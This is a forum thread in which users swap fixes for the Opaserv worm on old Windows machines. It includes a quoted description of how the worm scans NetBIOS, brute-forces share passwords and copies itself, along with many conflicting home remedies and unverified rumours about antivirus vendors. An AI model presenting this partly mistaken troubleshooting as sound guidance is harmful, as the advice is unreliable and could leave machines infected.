That virus landed on my PC on saturday and I could get rid of it on monday (booting on safe mode, erase service in registry...etc) but nothing about the dat files. The problem I have now because of Opaworm is that I disabled netbios (file sharing) on every card (ethernet and adsl modem) but when typing netstat -an in dos, the tcp port 139 is still opened and listening !!!! (also udp 137 and 138). I uninstalled TCP/IP for my lancard and modem and reinstalled, disabled netbios and file sharing in network menus, to see that that the tcp/139 was still listening.. Can anyone help to definetely disable it ? (no firewall solutions plz, I use winME) Thanx Xav

0

Thanks for all the replies. It's not on Norton's exclude list, because Norton is what keeps telling me the virus (file) is there. I found and deleted scrsin and scrsout first thing (regedit: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run ), as well as the tmp.ini in the root dir and scrsvr.exe in the windows dir, as well as editing win.ini to remove scrsvr.exe from the run line. I have two computers on the network for work purposes... I hate to disable sharing because that would mean I'd have to resort to more mundane methods of file transfer, though I'd be willing to try it just to see if it stops putting itself on the drive. Solo sounds interesting - never heard of it. I'll check it out. First thing I will try is the empty scrsvr.exe file... I'll let you know how it goes. :) Even so, _something_ in there is causing scrsvr.exe to respawn (or at least be detected by Norton) and rewriting the win.ini file... it's not giving me a new tmp.ini or scrsin or scrsout file... it's that elusive little 'thing' I'm after I guess. So in the meantime if I can get it to stop annoying me until the AV people figure out what's really going on, I'll be okay. Thanks again.

0

Did you try the new removal tool Syamntect has posted? http://securityresponse.symantec.com/avcenter/venc/data/w32.opaserv.worm.removal.tool.html Also, have you password protected any open shares?

0

We have had three people (Win95 & 2 Win98) machines so far infected. All of them have lost the ability to print to any printers! Has anyone else had that problem? I have to delete the printer, then re-add them.

0

Here's an odd thought: are you using Windows XP or Windows Millennium? If so, check this out: from the McAfee site. Hope it helps. Surfer

0

Wow, what a can of.. er... worms... we've opened here. It's been over an hour since my last 'Norton goes berzerk' episode. FTR: I'm running Win98se Here's what I did (and I'll put it in very simple terms here for the technologically challenged): o Open Windows Explorer o Navigate to C:\Windows (or whatever directory Windows is installed in) o Open Notepad - save a blank file as scrsvr.txt in the windows directory o Go back to Explorer o Click View > Folder Options > View Tab > then DEselect 'Hide file extensions for known file types' o Find the scrsvr.txt file o Right click on it, and select 'rename' o Rename it to 'scrsvr.exe' (first delete the 'other one' if it's already there, and be sure to empty your recycle bin) o Right click on the file again o Select 'properties' o Select 'read only' and deselect the other options IMO - This only cripples the thing... SOMETHING is trying (and was succeeding before I did this) to CREATE the scrsvr.exe file, even when I'm offline. Apparently this is a very hot topic, and very overwhelming. There's at least one other thread on this forum alone. One thing that I've noted is consistent - many people are experiencing symptoms, like mine, that are not addressed by Norton or McAfee (or others), and their removal instructions and tools aren't working. At least Norton will be quiet for a while now.

0

Yipp, i've got it too and the virus fix provided by symantec said the virus was not there even when it was. No entries forund in registry and no Tmp file created. Win.ini points straight at c:\scrsvr. Got rid of it earlier but it came back. So far it has messed up mouse, printers and messaging services. Will try the read only file trick, sounds like a good temp measure until the thing is full sorted.

0

I have the same problem, virus: "Win32.Opasoft.a" is creating a file scrsvr.exe and even when I remove it from win.ini file and from it's locations on C:\windows\scrsvr.exe IT DOES NOT HELP !!! Obviously there is something invisible working in windows system or some-kind of batch file. I can't disable C:\ drive because I'm working in small network enviroment. I use "Kaspersy Anti Virus Pro" but even this software can't help resolve this problem. How come NOBODY has answer or solution !!! Would this mean that this is perfect virus ??? Who ever can help, please let me know

0

Has anyone tried this removal tool: http://www.bitdefender.com/html/free_tools.php/

0

I mentioned this on the other thread but I found a file "koajgv.exe" which somehow also seemed to be involved. RS

0

Add me to the list!!!...and let's keep this thread going untill we figgure this one out... I have client that got it on the 27th...I've gone thru all the Norton instructions, been following a couple other threads and trying their recommends, but this varmit keeps coming back... Going to try both the Norton and Bit Defender removal tools tomorrow...will post back what luck I had... Steve

0

hei! here is the solution for the W32.Opaserv.Worm virus-> http://www.terra.es/tecnologia/articulo/html/tec5875.htm The only thing is that is the web is in SPANISH.

0

Honestly, this problem was posted earlier and Solo from http://www.srnmicro.com was able to clean it for two other people. For some reason Norton, Macafee and Trend Micro just do not have the solution yet.

0

This is amazing, well... this website doesn't help at all it has the same information than the others so don't waste your time (I have the same problem with Datom 1,2 & 3) http://www.terra.es/tecnologia/articulo/html/tec5875.htm I've tried all the removal tools for this virus, pqremove, symantec's (I can't remember the others) and they work... but only for a while !!, but man, I know it will be coming back again and again... I guess we should wait a little for the real answer. I've pinged www.opasoftware.com (don't click on it... just in case) and is strange sometimes it appears with this IP 209.67.50.203 and 127.0.0.1 ??? <- this is funny... but anyways. I also read that it goes memory resident maybe it is located in the MBR... should we try to find a removal tool but via a boot disk? mmm... Another thing, I've read that this virus is adquired when you access to certain websites and I also read that there were 4 "mayor websites" involved in this issue I don't know the addresses, maybe they are rumors but be careful...use an antivirus maybe AntiVir can help you out and it's free... yeahhhh babyyy yeahhh this is an outbreak =)!!!!!

0

I have a variation of this worm(My Virus checker is unable to see it at all!ie,Updated Symantec Nav 2002)-Registry entries have changed 4 times-Seems like it Began life as thtrkf.exe,then tssg.exe(which I deleted in turn),then SCRSVR.exe which disappeared,then loadqm.exe-each time I deleted all references to these rogue files,they seemed to come back as mutations after locking my pc up on Restart- Finally,I'm left with the situation of the Win ini files pointing to SCRSVR.exe which does not exist-will try your option of renaming an empty text file-Thanks Guys-Please don't give up on this one.. By the way,I did notice one other nasty little thing about this Virus-If I isolate my machine from the net(& I have a Good Firewall-Zone alarm)the crap entries do NOT return..this is interesting-maybe this virus polls another site for a Viral update??

0

This is really a funny virus......WHY FUNNY? are u using norton 2002? or a mcafee? I am monitoring a 53 computers here in my firm. And everytime, I mean DAILY, I am updating my virus definition files. Last October 1, I updated all virus definition with this date --> October 1, 2002 with the filename 20021001-008-i32.exe. Suddenly all viruses appear. Though I already updated my virus definition last Setp 30. And the virus release was on SEPT 28, why is that happen?.. IS THIS A BUSINESS? or a monkey business... I have a big doubt.. Look -> there is a new antivirus now NORTON 2003. a new realease by norton company... the virus is attached on the virus update last october 1.... hmm.... correct me if im wrong..... THE BEST SOLUTION IS -> BY A NORTON 2003 ..HE HEHE

0

hehe... see? that's the funny part, I guess it was triggered by something, an update or maybe that's the cause for checking an URL or the rummors with the websites (I don't have a network or shared drives so I don't know how I got infected) ...and I say this because the day and the date of infections are almost the same in all our cases... and in a few hours it is in the top 5 viruses of panda activescan? mmm well I deactivate my AntiVir and create the empty txt file named scrsvr.exe and it looks like it worked, give it a try

0

I think I have found another clue to licking this thing. All the documentation says that it puts entries into the Registry at HKCU\Software\Windows\CurrentVersion\Run. Well, I just found that it had created new keys in the Registry at ...CurrentVersion\Explorer\Discardable\DocFindSpecMRU and at ...\Explorer\RunMRU I think that explains how it manages to keep coming back. I hope so. I have been fighting this thing since Monday.

0

My computer is now going down when i open files. I.E. if i try to open notepad trhe computer stops, the screen is black and i have to restart. My printers are not working. Norton can't help. I have tryed response 18, but i don't think it helps. Who has a good solution? Albert

0

reponse on number 24. You find teh virus there because you have searche to scrsvr. In that key you find all the searche you did. Remove did not help.

0

Albert, I also did everything McAfee gave me to do - in Safe Mode I changed Win.ini, deleted the file ScrSvr.exe. And, just in case it would help I ran the DOS scan program from McAfee. I searched the Registry for not only that file, but also the tmp.ini and the Scr*.dat files. I have had the machine running now for more than an hour without any new surprises, which is much longer than before. McAfee was popping up with a new ScrSvr.exe file about every 15 minutes before. It may not be "cured", but something is better.

0

And, Albert is right. The file did return, but after a much longer time. Some program is still sitting in memory somewhere.

0

I have reinstalled my printers, they are now working again. But my computer is still going down after working about a half houre. I had never such a virus. Who can help me to remove this virus? Albert

0

Hey It's been over 20 hours since my last 'attack'... the read-only 'scrsvr.exe' DECOY works (see my previous post). Norton and McAfee still aren't reporting the same symptoms I (and others) have had. I can't assume that their assessment of 'low risk' is accurate, since their report isn't, at least, not for my situation - maybe there's more than one variant out there.

0

*whistles* Damn. I've been battling with this one since last week in various guises. Here's a few of the files to look for - flsfr.exe, tssg.exe., dialer123.exe, mssg.exe ... and a whole bunch of alphabet soup exe's. I found and deleted the registry keys at HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Discardable\DocFindSpecMRU and ...RunMRU. There's also an entry at the end of StreamSRU named MRUListEx that I'm wondering about. BTW, my first 'symptom' on this was a constantly open listening port that was spamming continuously. This one is driving me nuts!

0

Kaspersky lab just posted some technical detail of the virus: http://www.viruslist.com/eng/viruslist.html?id=52256

0

I'm having exactly the same problem. AVG Anti-virus finds and removes it but it keeps coming back. It could be my imagination, but opening Internet Explorer seems to trigger it. I hope someone finds more info soon.

0

Use the method of the Blank TXT file, it really works... tnx maggie =0), I looked at my win.ini file and it appeared with a different character every single time, I guess when I reboot the pc it mutates, well try the txt file and relax this is going to be annoying us for a while

0

Well, here is what I have done... Client got it on his laptop 2 days ago... It does NOT appear in the registry where Norton says it should be... It DOES appear in the win.ini file and it appears in msconfig>startup... I remove it from msconfig>startup and delete the line in win.ini and it will go away for a few hours, then comes back... Norton and Bit Defender,as of last night, had removal tools posted... I am now at another client with same characteristics as my laptop client... I checked the mssconfig>startup and win.ini file and the scrsvr.exe is listed...I did not delete the entrys... I ran Bit Defender removal tool first, it did NOT detect the worm... I just finished running the Norton removal tool, and it found 3 instances, advised it could not delete... The Norton removal tool finished running, then I could not close the Norton removal tool!!!...and it did not show it had found anything!!! The NAV 2002 quarenteen folder has NO scrsvr.exe files in it... I'm going to try Maggies idea next, the empty txt file and see if it has any effect... On this particular computer, I don't think it is gone, but both the Norton and Bit Defender removal tools, at this point, do not seem to have deleted it, and that's not encouraging... Also, read the Kaspersky site info posted up a little, it has some good background info... More later Steve

0

well i ran the symantec removal tool (http://securityresponse.symantec.com/avcenter/venc/data/w32.opaserv.worm.removal.tool.html)....twice. the first time it said that it removed scrsvr.exe from my computer and the second time it congratulated me for having a virus free computer. *fine*. so i go back on line and turn off my zone alarm firewall to see what would happen....baff.....the virus shows up again and is quarantined by norton antivirus. whats the deal? the only way im able to keep virus from entering my computer is by using a fire wall. what now? suppose i do not want to use a fire wall because of an app that doesnt run well with one....e.g...some web conferencing. btw...i am on a lap top with no shared network....please help!

0

The best way I have found to get rid of this: run regedit, get rid of the scrsvr.exe in the run key. run sysedit, get rid of the run= line at the top of the file (if it points to tmp.ini or scrsvr.ini) delete tmp.ini from the c:\ directory delete scrsvr.exe from the c:\windows directory if you are using Norton, make sure your definitions are no older than 10/1/02 To keep it from coming back, go to the C drive and look for the sharing setup If the share is named "C" just change it to something else unique. Windows will set this as the default name for sharing the drive, and this seems to be what it is looking for. The virus is not being regenerated from a file on your computer, it is coming in through the LAN and your file sharing. Reboot. We had it on 8 computers here - and no new ones have popped up in the last 2 days. Your mileage may vary...

0

More info...Add to my posts # 17 and #35... Bit Defender has a removal tool... http://www.bitdefender.com/html/free_tools.php/ I tried it in a known infected machine and it did NOT identify the Opasrv worm...the computer has NAV2002 with the 10/02 definition file...it has popped about 10-15 Opasrv warnings...it will ask what to do and I can quananteen some times, delete other times, not consistant... I checked before running Bit Defender removal, it had the scrsrv entry in the Win.ini and in msconfig>startup... There were NO entries in the registry... I tried Nortons removal tool... http://securityresponse.symantec.com/avcenter/tools.list.html I had a little more luck with it...while the removal tool was running, NAV popped up with a warning on Opasrv, I quaranteed it...but when the removal tool was finished, it had found one instance of Opasrv, and removed it... But I could not "close" the Norton utility, the computer was partially locked up...at that point I had to shut down and restart... I then opened msconfig>start and found the line scrsvr.exe, looked in the Win.ini file and it showed up as a run=scrsvr statement... So, I assume I still have it... Deb, post #31 makes reference to HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Discardable\DocFindSpecMRU... I looked at a standalone W98 machine, never on the Inet and never had email on it, and it has the DocFindSpecMRU and the RunMRU listed, so I don't know, but I suspect the worm did NOT add those keys... She also refers to flsfr.exe, tssg.exe., dialer123.exe, mssg.exe, and these are all files usually associated with backdoor trojan/worms...Good work Deb!... Now, we need to determine if Opasrv is adding any of these files into the mix... Check out http://www.viruslist.com/eng/viruslist.html?id=52256 on the Kaspersky site...this is a good "read" on how this varmit works... So far, I have worked on 2 infections, a laptop and a W98 desktop...since we are a firm that supports small networks, about 200 clients, and some of them not well protected from viruii, I suspect in the next week or so I will be fightiing this little bugger pretty regular... But so far, I do NOT have a sure fire way to kill this thing... And the confusing aspect in my 2 infections is in NEITHER case do the HKLM registry edits contain anything referring to ScrSvr=%worm name% as this is where I would expect it is able to "re-generate" itself and reappear after you think you got rid of it... I suspect it's gonna be a week or so before the "big boys" at Norton, et al, figgure out a way to sure fire kill this thing and get an effective utility out there for us to use... I was going to try Maggies, post #8, idea but after reading the Kaspersky info, I decided that this thing probably has the ability to either overwrite the empty text file, or ignore it...Maggie, I know you have been "free" now for about a day, and maybe you really have found a method that will work...I hope so... That's my stuff for now... Lets keep the thread going...I know there is more info to share... Steve

0

Another tool to try. Good luck http://www.pandasoftware.es/library/W32OpaservD_en.htm Link worked at time of posting.

0

Maggie's idea did NOT work for me... I tried it before I came to this site...but nothing else seems to work either. I will Try again. BTW - My symtoms included Rundll32.exe trying to access the internet. The only other time it has doen that, was with the Trojan virus (i have removed that one).

0

Maggie, Since trying your "fix"I have not had any more instances of SCRSVR.exe,but the startups in Win.ini are still trying to execute the text file substitute-have you removed these win,ini references on your machine & do they remain deleted OR is it necessary to put up with messages-"scrsver.exefile not executed,etc" at startup-My machine is periodically locking up at Shutdown also-anyone else got this?? Regards to all!

0

ive managed to put it to "sleep" by renaming my "c" share to something else.. [yes i have alphanumeric passwords, always have :)] i know its still there, dorment, but at least its snoozing now till the AV companies catch up

0

Yes, my machines running Win98 get frozen every time I shut them down. (not the ones running XP Pro) I tried all the solutions posted, but still have the same recurrent virus problem. I hope someone finds a real fix soon. It is driving crazy my whole network.

0

I used Maggie's method yesterday and so far haven't had any more problems. I think that it puts the virus into remission, for now at least. I've found that quite of few of my .jpg and .doc files have been duplicated and are being placed in multiple folders. Anyone else with this problem?

0

The latest version 10/04/02 of Opaserv.Worm virus removal tool works great.... if you follow instructions and be sure to disconnect from the internet and other PCs before running. Also clean up the Win.ini file removeing run= value ( can be left if virus not found before win.ini is clean) and disabling or at least password protecting your file/printer sharing!

0

Maggies tip of read-only scrsvr.exe in C:\windows 100% works on my Win98SE PC. I have had not attack in hours when it used to occur every 5 mins or so (when I was on-line only). Note my drives are fully shared with no password and I wanted to KEEP THEM that way so the text file solution is a cool temp work around until a proper permanent fix comes up. If the read-only file solution does not work for you then you may have ANOTHER VIRUS such as BUGBEAR which a lot of people seem to be getting confused with this one. Also the so called fix programs never work, they just clean it off for 5 minutes and then it comes back (if you are on-line). Only unsharing or passwording your shared drive works, but the text file solution is best. Dumb virus can't overwrite the file, haha. Jake

0

I am sending out a special thanks to Maggie, tried her solution on Windows ME and have not had that stupid Nortons activated since trying her fix. I am more pissed off of Symantec and McCaffee for not coming up with something better. It takes the hard efforts of all the techies out there to come up with something better then what Symantec tries to do. I applaud all of those out there who come up with better ways to solve problems on their own, instead of relying on the Corporations that dont know jack. Thanks Again MAGGIE!!!!

0

HERE'S THE SOLUTION.... Ok, everyone, I found a cure for being constantly re-infected with the Opaserv/Opasoft virus. After doing some research (see references below) I found that disabling the "File & Printer sharing" in Windows did the trick to keep me from being re-infected after cleaning the virus. That solved the problem of being re-infected but now I have a home network that is dysfunctional because I can't be online and have file & printer sharing enabled. Boy this stinks but for now it's the only safe thing to do that I'm aware of. Below is the info that tells how the Opaserv/Opasoft virus finds it's victims. All you need to do is be connected to your ISP and it can get you!!! PS: Maggie, you have to realize that putting a read only copy of a file named c:\Windows\scrsvr.exe may stop this virus from coming back but you will still be vulnerable to the next virus that comes along and uses the "File & Printer sharing" vulnerability that's built into Windows. ---pete--- Full article on Opaserv Virus.... https://www.europe.f-secure.com/v-descs/opasoft.shtml =============================================================== Excerpt from full article above... To locate victim computers the worm scans networks by using port 137 (NETBIOS Name Service). The following subnets are scanned: - current (infected) computer subnet (aa.bb.cc.??) - two neighbor subnets (aa.bb.cc+1.?? , aa.bb.cc-1.??) - random selected subnets (except several ones that are "disabled" for scanning) In case there is reply from an IP address (i.e. there is real computer at this address), the worm also scans two subnets that are neighbor to that address. When "reply data" is received the worm checks the special field in it. In case this field contains information that victim computer has "File and Print Sharing" service activated, the worm starts infection routine. The infection routine specific SMB packets to the found IP address by using port 139 (NETBIOS Session Service). There packets cause the following actions: 1. The worm established connection with \\hostname\C resource on a victim machine (where "hostname" is a victim machine's name, that the worm gets this name from "reply" data). 2. In case the resource is protected by a password the worm tries to open it with all one-symbol passwords (brute-force attack). 3. In case of successful connection the worm sends its EXE file to a victim machine. The packet also contains the destination file name on the target computer: WINDOWS\scrsvr.exe ---end or excerpt--- =================================================================

0

I got this virus after trying to install latest update of ZAPRO. Instructions were to switch off running version, which I did and promptly got 3 NAV warnings. 1st try wouldn't quarantine, 2nd wouldn't delete and 3rd finally quarantined. I stopped all activity and re-installed previous ZA firewall. Finally able to remove and delete all further (6) infections. I'll try Maggies method for now and disconnect from the network to re-try ZAPRO install

0

Re the terra page in spanish : http://www.terra.es/tecnologia/articulo/html/tec5875.htm After the 1st para there's a cream coloured box wave the mouse over it youll see its a link for downloading Panda Quick Remover..right click and "save target as" will download it, then just click on it to run. Its free. I've been using Panda Anti Virus for a while IMO one of the best and their replies to queries are quick..much better than Norton or McAfee... goood luck

0

I have just tried Doug James' panda quick remover, it found and apparently got rid of it. I hope it works. This thing has been at me for well over a week grrr

0

Ok - about Panda remover tool : when i tried to run it - my DR.Web antivirus told that the file pavcl.com infected with Win32.Benny.6382 virus - so , make Your own decisions about this so-called tool ....

0

Hi everyone, I haven't responded in a while... not because the problem has 'gone away' (which it has), but because my 13 year old cat has apparently been infected with the BugBear virus. He's gone mad. Without warning, he has informed me through his actions that my daughter's bed, the front hall, and the floor beside the aquarium make MUCH better litterboxes than that thing he has to share with the other two. So... I've been going buggy away from the computer. I still love you though! OK, my responses to a few posts since my last confession: #38 - I've actually been 'free' since 11:16 am on 10/2, the time and date I created the dummy scrsvr.exe file :) #40 - It might not have worked for you if you didn't mark the file as 'read-only'. This is a critical step that must not be skipped. Do the whole removal process over, then right click on the blank scrsvr.exe file you created and click 'properties'. Check the box beside 'read-only'. NOTHING can overwrite this file after you do that without your permission AFAIK. Make sure you go into win.ini after you create the file and remove that run line thing. Good luck. #41 - Your computer is still trying to run scrsvr.exe because it's probably still in the run line of your win.ini file. If you've made the read-only dummy, go into win.ini and delete the string after the run= line that references c:\windows\scrsvr.exe ... it may have reappeared after you did this step before if you altered win.ini BEFORE you made your dummy file. Hope this helps. #48 - OHHHHH YESSSS... I *DO* realize that simply disabling THIS virus doesn't protect me from the next. That's why I was so concerned about what mechanism was causing it to spawn so frequently. I think the suggestions here http://service4.symantec.com/SUPPORT/tsgeninfo.nsf/docid/2000091415173339 and in post #37 (changing the name of your root directory) need to be followed in ADDITION to the dummy scrsvr.exe (read-only!!) file to protect you from future attacks. I'm going to rename my C drive. I'm also going to change the password AND ensure my husband's root directory is also password protected. . o O (Good god, he's listening to Ozzy Osbourne doing the Bee Gee's (Staying Alive). What is happening to my family!? )

0

OK. I couldn't at 1st remove the exe file from windows, it just continually spawned just as if it was a loop. It activated just by highlighting the file in Win explore. Even after disconnecting physically from the network it was there.I had to exclude it from NAV to continue. I run Win ME btw.I downloaded the tool from the Norton site, Disabled System Restore, which means re-starting afterwards. I then ran the tool which removed and repaired the worm files. Then I searched for the scrsvr.exe file, which of course wasn't there now. I renamed the scrsvr.txt file I previously had created to be the .exe file read only, re-enabled System Restore,and re started. Seems to be ok now, but I'm not holding my breath. Point for ME users, you MUST disable System Restore before running the tool. You can re-enable it afterwards.

0

Can I remove in DOS mode Run=MSVXD.EXE,c:\windows\scrsvr.exe Will this work?

0

just a question, do you have a file named systenn32.exe in c:\windows\system?

0

oh sorry, it´s systennn32.exe, i think in my case it´s somehow related to the virus

0

Hi I tried this and it appears to have worked!! However, just wondering, do I need to do anything else? Is my computer ok with the scrsvr.exe read only file? I am hesitant to run another virus scan and screw things up but I don't want any viruses on my computer either. The win.ini file still has the run=c:windows.scrsver.exe message, is that ok to leave as well, since the virus stop popping up? Switching off sharing of drive c: helps 100% - the virus will never return. It seems that it can use only c:\windows folder. If it is not possible, you may try an advice from the thread below - put empty or text file in c:\windows, rename it scrsvr.exe and make it read only (I didn't try this - but it looks reasonable). BTW, when cleaning 20+ computers in our LAN I never found any ScrSin.dat or ScrSout.dat.

0

Hi!! I have followed Maggies advice, and thx, so far it is working. One problem I appear to have are my system resources. They seem to be being eaten up rapidly and voraciously by an unknown being..now could this being be the worm still? I am running NAV2002 as well as ZA Pro. If I disable ZA, my resources appear to magically appear again. Has anyone else had this problem, and does anyone have an clues?

0

I am a computer service technician in Aurora Colorado who was called out to repair an infection of this worm. I experienced most of the same things you have all posted here: -Nortons removal tool unable to locate the virus. -Virus messages reappearing every 5.5 mins while connected to internet. -Misplaced entries in the win.ini files. Like most of you, I deleted the scrsvr.exe file, and removed the win.ini entries, and it did no good. *SOLUTION* - After about 30mins of troubleshooting, I came to this solution: 1. Connect to internet; wait for Nortons virus warning to appear. 2. Select EXCLUDE (continue should work too) from the list of options presented on the warning screen, this will allow the virus to continue with its activity. 3. Download the appropriate virus removal tool from Symantec.com 4. Disable system restore if applicable. 5. Disconnect the computer from the internet, phone lines, and network. 6. Run the virus removal tool. 7. Scan the HD for any other infections. 8. When system is clean, enable system restore, reconnect phone lines, and reconnect network. Hope this helps you too. P.S. - These steps were used on systems running windows 98se and NAV 2002. For other versions and/or anti-virus programs, the ideas would be the same. Allow the virus to continue with what it is going to do, then remove it from your system.

0

I`m infected too, and used the read only trick, removed it from win.ini etc. Didn`t work. I don`t know if it helps anyone. but it opens the hosts file in the windir. Maybe someone could check wich file is opening the hosts file. It also seems to crash Zonealarm pro, and even deletes the rules for scrsvr.

0

re-start in MSMode,use command : dir scrsvr.exe (enter) then : del scrsvr.exe (enter) :exit then windows restart , run norton to see if its still there if clear re-connect to outside world.It worked for us .If you are networked , diconnect before running antivirus.Good Luck

0

hey i also had this worm, i just did what maggie said and renamed it and i have not hap one prob, my hard drives are still shared and i have not had norton come up once about it, some advise just do what maggie says it will work

0

Well I can offer all you 4 solutions: -Info on this virus: http://securityresponse.symantec.com/avcenter/venc/data/w32.opaserv.worm.html -The removal tool for this virus (FOLLOW ALL THE INSTRUCTIONS) http://securityresponse.symantec.com/avcenter/venc/data/w32.opaserv.worm.removal.tool.html -Call NAV Virus Removal (Fee Based) 1-877-832-2811 -Call NAV Virus Removal 900 Line ($4.95/min) 1-900-646-0004 The main problem is that most people do not read all the instructions for the removal tool or they do not know how to do some of the methods.

0

This is what i found on this Virus- Some help here! Upon Execution, W32.Opaserv.Worm does the following: It will check for the value: ScrSvrOld under the registry key: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run and if the value exists, it will delete the file pointed to by the above registry value. If the above value does not exist, it will then check if the value: ScrSvr under the registry key: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run exists, and if it does not, the worm will add the value: ScrSvr %Windows%\ScrSvr.exe under the registry key: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run Next, it will check if it is being run as the file: %Windows%\ScrSvr.exe if not, it will copy itself to the above filename and add the value: ScrSvrOld under the registry key: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run After checking the registry values and the location from which the worm is executing, the worm will check if it is currently executing by creating a Mutex with the name: ScrSvr31415 If it is not already executing the worm will register itself as a process under Win9x, or under other Operating Systems it will elevate the worm process priority. The worm will then enumerate the network looking for "C\" shares and for each share it finds, it will copy itself to "C\Windows\scrsvr.exe". It also modifies c\windows\win.ini to read: run= c:\tmp.ini It will also create the file: c\tmp.ini which contains the text: run= c:\windows\scrsvr.exe

0

Alfonso (Post #64), First: Have you actually been infected with this virus? From your post, I tend to doubt it. Second: I am not using NAV on my machine so I chose to download Norton's removal tool and run it from a floppy. My system is Win98 so the instructions regarding ME and XP obviously do not apply to my situation. The following is taken directly from the Norton's web page for my system: ------------ How to run the tool from a floppy disk 1. Insert the floppy disk that contains the FixOpsrv.exe file in the floppy disk drive. 2. Click Start and then click Run. 3. Type the following and then click OK: a:\fixopsrv.exe NOTES: There are no spaces in the command a:\fixopsrv.exe If you are running Windows Me and System Restore remains enabled, you will see a warning message. You can choose to run the removal tool with the System Restore option enabled or exit the removal tool. 4. Click Start to begin the process, and then allow the tool to run. 5. If you are running Windows Me, then re-enable System Restore. ------------ Perhaps you could explain to me which step it is I might have missed. Steve. PS - for everyone else, please forgive my rant. I rather dislike this sort of better-than-you attitude.

0

My Problem My machine is not on a network, but I have been trying to get rid of the Opaserv worm for over a week. I downloaded NAV 2002's definitions and found them unable to fix the problem, I downloaded their Opaserv remover, which seems unable to find the worm, yet every few minutes NAV 2002 warns me about scrsvr.exe. Much of Norton's info about the Opaserv worm doesn't seem to apply to my variety. I have no Tmp.ini or ScrSin.dat and ScrSout.dat files. Trying to open Win.ini brings up a message that it doesn't exist, while it is visible in the folder. Fortunately I have a backup copy, but the active copy keeps getting changed. Your solutions helped But this forum has given me two easy things to try: the read-only textfile named scrsvr.exe and renaming the shared C:\ drive. I did this about a hour ago, and so far NAV has been quiet. I am hopeful ... Thanks for the help.

0

Best sollution we have found is to create a dummy c:\windows\scrsvr.exe file with Read Only Attribute. To do this, open MSDOS and type the following commands: cd \windows del scrsvr.exe echo dummy > scrsvr.exe attrib -R scrsvr.exe Ready. This does not kill the virus, but it is a bannana inside its cum.

0

EHHH! Error on my commands!!! The good commands are: cd \windows del scrsvr.exe echo dummy > scrsvr.exe attrib +r scrsvr.exe Do you see the difference?

0

Have this virus too, for over a week. 1st notice something wrong was 100% outbound indicator light on the dialup icons. Loaded free Sygate Personal Firewall from website. It is a magnificent program, showed immediately outbound traffic to IP address 216.xxx (I didn't write it down but could easily bring it back to see)... I allowed Sygate to disable that traffic line. Every 5 minutes or so, it retried and Sygate promptly notified and I continued to disallow traffic. That was the beginning and I am STILL trying to stop it after deleting and redeleting win.ini entries, scrsvr.exe file and hacking it out of the registry. Thank you all for this thread, good ideas to try tonight, the READ ONLY decoy file and the C drive share rename and password creation. By the way, I had the C:\tmp.ini file. Also, had run=qtpko.exe and run="oaeooeo".exe files in the MSCONFIG setup. Sorry, not exact memory on the oaeooeo filename, but was VERY close to that. This same crap on 2 computers at my house, both on ISP dialup. Additional symptoms, related or not?? 1.Mouse buttons keep reversing, won't stay set correctly. 2.Ctrl key on keyboard non functional. 3.Momentary freeze ups, then release. Cannot type long sentences without freeze ups. 4.Often will not shut down. 5.Often starts up and lockup just as systray icons are loading, have to hard reset.

0

I just had a run with this virus this morning, took care of it the person who said to use a dummy file is right in that it stops, or pauses the virus. do a 'files containing text' search for scrsvr.exe, and you will find a few references to it, win.ini, and wintemp.ini in my case, read them both, there is a copy msvxd.exe to scrsvr.exe line in there, that should be deleted, along with the scrsvr refs, delete the copied file,(in my case it had all the 'real' microsoft information when I checked it with properties),But if it's a real vxd it will have the vxd extension, then make up a bat file, or add a line to the auto exec.bat that will delete scrvr.exe before windows starts, (echo y|del c:\windows\scrsvr.exe) if you want to make sure that you have all references to it removed, (I found four refs to it in the reg) download a copy of dev-cpp from bloodshed software, and make up a console app that has a count down delay in it,so it stays visible for a second or two on boot up that way you know you have all refs out of the system. I also use the same 'dummy' program to get around a lot of annoying messages, and to disable some features that I don't want or need in some program packages. (the live news update, registraion reminder and so on on the sblive 5.0 driver disk for one thing.) also some of the adware stuff.

0

I operate a computer services business in the south of England. I have and still are dealing with many OpaServ infections, both on networks and stand alone machines. I have seen this virus magically re-appear on mail servers I have been working on. Once the virus has been removed from the system all is ok. When you connect to the internet something triggers and the virus returns to the system from the Internet. A fire wall will keep it out e.g. AlarmZone Pro. McAfee are aware of the problem, and believe that the OpaServ virus plants a backdoor in the system, but thay are still trying to identify the process. They did release to one customer a test DAT update to hopefully cure this virus, but it did not work (I now have a copy of this Dat update to have a look at). So if you are seeing this virus mysteriously returning to your system, you are not going mad. Even if you have removed all traces of the virus it can still come back. The SCRSVR write protected file in the Windows directory will keep it from returning, but it does not cure the problem in the long term. Also try not to share your Windows or complete C: drive across the network. If you can switch off all file & print sharing. I hope this info helps you? Chris

0

I had this virus too. I fixed it last night with my own "Polgar fix" :-) Here is a synopsis... An online industrial auction I check often showed that at 11:55 pm 10/1 my computer accessed and bid heavy on a number of items. As I said, I check often and found this. Called them and tried to find what happened. I run various virus checking utilities regularly. They said I had a hacker, a virus, or disgruntled employee. I could find no virus. I run zone alarm and noticed 10/5 there was a lot of outbound net traffic and I wasn't doing anything. I had recently gotten zone alarm requests for scrsvr.exe to access the net. ( I am not a programmer or anything, I thought it was a screensaver getting some new pics!). I let it. But I noticed it more and more requesting access. So 10/5 I began an internet search. I found it was a virus. The McAffee site said discovered 10/5, no fix and working on it, not much other information yet at that time. 10/6 I used zone alarm to deny scrsvr.exe access to the net. Still could see it pinging but not going through on the sensor. It was tying up resources and was deactiviating my security feature! I kept getting zone alarm vsmon shut down after being on for a while. I would have to shut down and reboot to get it to load again. It looks like this was a time coded virus that was sent out and activated all on or about 10/01. It either copied my clicks or sent info out like passwords to someone who played havoc with the auction. I think it is on auto pilot to be mischiovous and acts differently on different setups and configs. Last night in my research I found this thread. Read it ALL along with other website info. Here is what I did: 1. deny access through zone alarm to scrsvr.exe. 2. couldn't remmber how to shut of system restore and disconnected from the net so I didn't shut it off. 3. searched for all the file names listed in this thread. found only scrsvr.exe in windows and tmp.ini in root. 4. used 12 ghosts shredder program and shredded tmp.ini. scrsvr.exe said in use and did not allow shredding, deleting or altering. I tagged it for shredding on next boot. 5. eidted win.ini in notepad to remove scrscv.exe from the cmmpu line. 